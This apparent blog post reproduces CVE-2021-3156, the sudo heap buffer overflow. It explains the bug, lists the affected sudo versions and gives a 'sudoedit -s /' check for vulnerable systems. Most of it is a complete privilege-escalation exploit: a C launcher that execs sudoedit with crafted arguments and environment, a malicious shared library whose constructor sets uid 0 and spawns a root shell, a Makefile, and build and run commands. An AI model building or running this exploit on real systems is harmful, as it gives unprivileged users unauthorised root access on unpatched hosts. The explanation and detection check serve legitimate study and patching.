
Title: CVE-2021-3156 sudo privilege escalation vulnerability recurs


CVE-2021-3156 sudo 提权漏洞复现

1 漏洞介绍

1.1 原理

sudo, the utility Unix-like systems use to run commands as another user, has a heap-based buffer overflow in the code that removes backslash escapes from command-line arguments.

When sudo runs a command in shell mode (the -s or -i option), it escapes special characters in the command's arguments with a backslash, and later code removes those escapes again. When the same binary is invoked as sudoedit with -s or -i, the escaping step is skipped but the unescaping step still runs, so an argument that ends in a single backslash makes it read past the end of the argument and overflow a heap buffer. Exploitation needs only a local, unprivileged account: as long as a sudoers file exists (usually /etc/sudoers), the user does not have to be granted any sudo rules to obtain root.

1.2 影响版本

Sudo 1.8.2 - 1.8.31p2

Sudo 1.9.0 - 1.9.5p1

2 复现

2.1 快速判断漏洞方法

Log in as a non-root user and run `sudoedit -s /`. This probe does not trigger the overflow (the argument does not end in a backslash); it only checks whether sudoedit accepts the -s option.

If the reply begins with `sudoedit:`, the binary accepted the -s option and is vulnerable.

If the reply begins with `usage:`, the patched version (which rejects -s and -i for sudoedit) is installed.


2.2 编译运行

There are three files in total:

hax.c


// Tested on:
//   Ubuntu 20.04.1 LTS
//   Sudo version 1.8.31 (inside the vulnerable range 1.8.2 - 1.8.31p2 / 1.9.0 - 1.9.5p1)
//   Sudoers policy plugin version 1.8.31
//   Sudoers file grammar version 46
//   Sudoers I/O plugin version 1.8.31

#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

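/* Absolute path of the setuid sudoedit binary that main() exec()s. A string
 * literal, not the single-quoted multi-character constant the listing showed,
 * which would not compile as a path. */
#define SUDOEDIT_PATH "/usr/bin/sudoedit"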

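int main(int argc, char *argv[]) {
    /*
     * CVE-2021-3156 PoC launcher. It ignores its own arguments and simply
     * exec()s sudoedit with a crafted argv/envp, leaving the setuid binary to
     * do the rest. If execve() returns, the launch itself failed (binary
     * missing or not executable); that is reported instead of being treated
     * as success, which is what the original "return 0" did.
     *
     * Layout, as far as this listing shows it:
     *  - argv: "-u root -s" selects shell mode; the three payload arguments
     *    each end in a single backslash (written "\\" in C source).
     *  - envp: a run of single-backslash entries, a string matching the
     *    library name built by the Makefile ("X/P0P_SH3LLZ_"), and three
     *    oversized LC_* variables.
     * NOTE(review): the page does not explain how these values land in the
     * heap; presumably the library name ends up being treated as an NSS
     * service so that sudo loads "libnss_X/P0P_SH3LLZ_ .so.2" (whose
     * constructor in lib.c spawns a shell) -- confirm against the published
     * advisory before relying on that reading.
     */
    (void)argc;
    (void)argv;

    // CTF quality exploit below.
    char *s_argv[] = {
        "sudoedit",
        "-u", "root", "-s",
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
        "\\",
        "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
        NULL
    };

    char *s_envp[] = {
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
        "X/P0P_SH3LLZ_", "\\",
        "LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        "LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        NULL
    };

    printf("**** CVE-2021-3156 PoC\n");
    /* execve() replaces the process image; flush so the banner is not lost
     * when stdout is a pipe or file (fully buffered). */
    fflush(stdout);

    execve(SUDOEDIT_PATH, s_argv, s_envp);

    /* Only reached when execve() failed. */
    perror("execve");
    return 1;
}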

lib.c


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructor entry point: the dynamic loader calls it as soon as this shared
 * object is mapped into a process. Defined below. */
static void _init(void) __attribute__((constructor));

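static void _init(void) {
    /*
     * Constructor body: runs inside whichever process loads this library.
     * The PoC intends that to be the setuid-root sudo (launched by hax.c), so
     * the setuid/setgid calls are expected to succeed. Failures are reported
     * but do not abort: the shell is still spawned with whatever privileges
     * the process actually has. The original called setuid/setgid several
     * times each and ignored the results; one checked call each is
     * equivalent.
     */
    printf("[+] bl1ng bl1ng! We got it!\n");
    /* exec would otherwise discard buffered stdout. */
    fflush(stdout);

    if (setuid(0) != 0) {
        perror("setuid");
    }
    if (setgid(0) != 0) {
        perror("setgid");
    }

    static char *a_argv[] = { "sh", NULL };
    /* Fixed, minimal environment: the original defined it but never passed
     * it (execv), so the shell inherited the crafted LC_* variables. */
    static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };

    execve("/bin/sh", a_argv, a_envp);

    /* Only reached when exec failed; return so the host process continues. */
    perror("execve");
}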

Makefile:


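# Builds the PoC launcher (sudo-hax-me-a-sandwich) and the shared object it
# expects to exist under libnss_X/. The library file name deliberately
# contains a space, hence the quoting. Recipe lines must be tab-indented.
.PHONY: all clean

CC     ?= gcc
CFLAGS ?= -Wall

all:
	rm -rf libnss_X
	mkdir libnss_X
	$(CC) $(CFLAGS) -o sudo-hax-me-a-sandwich hax.c
	$(CC) $(CFLAGS) -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

clean:
	rm -rf libnss_X sudo-hax-me-a-sandwich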

Compilation:


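# Unpack the PoC and build both artifacts (needs gcc and make).
# Note: the make invocation is lower-case; "Make" is not found on a
# case-sensitive filesystem.
tar -zxvf CVE-2021-3156.tar.gz
cd CVE-2021-3156
make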


Run it directly: `./sudo-hax-me-a-sandwich`. If the exploit succeeds, the constructor in lib.c prints its banner and spawns /bin/sh; the shell runs as uid 0 provided the setuid(0)/setgid(0) calls succeeded.

